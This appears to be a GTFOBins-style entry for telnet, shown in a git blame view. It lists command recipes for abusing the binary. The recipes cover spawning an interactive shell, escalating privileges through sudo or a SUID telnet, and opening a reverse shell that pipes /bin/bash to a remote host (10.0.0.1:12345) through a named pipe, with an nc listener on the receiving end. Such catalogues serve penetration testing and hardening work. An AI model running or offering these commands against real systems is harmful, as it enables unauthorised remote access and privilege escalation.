37 lines
803 B
Markdown
Raw Normal View History

2018-05-21 20:14:41 +01:00
---
functions:
exec-interactive:
2018-05-22 21:26:17 +01:00
- description: BSD version only.
code: |
2018-05-21 20:14:41 +01:00
RHOST=www.google.com
RPORT=80
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell:
2018-05-23 08:08:13 +01:00
- description: Run `nc -l -p 12345` to receive the shell on the other end.
2018-05-22 21:22:20 +01:00
code: |
RHOST=10.0.0.1
2018-05-23 08:08:13 +01:00
RPORT=12345
2018-05-21 20:14:41 +01:00
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
sudo-enabled:
2018-05-22 21:26:17 +01:00
- description: BSD version only.
code: |
2018-05-21 20:14:41 +01:00
RHOST=www.google.com
RPORT=80
sudo telnet $RHOST $RPORT
^]
!/bin/sh
suid-limited:
2018-05-22 21:26:17 +01:00
- description: BSD version only.
code: |
2018-05-21 20:14:41 +01:00
RHOST=www.google.com
RPORT=80
./telnet $RHOST $RPORT
^]
!/bin/sh
2018-05-22 21:26:17 +01:00
2018-05-21 20:14:41 +01:00
---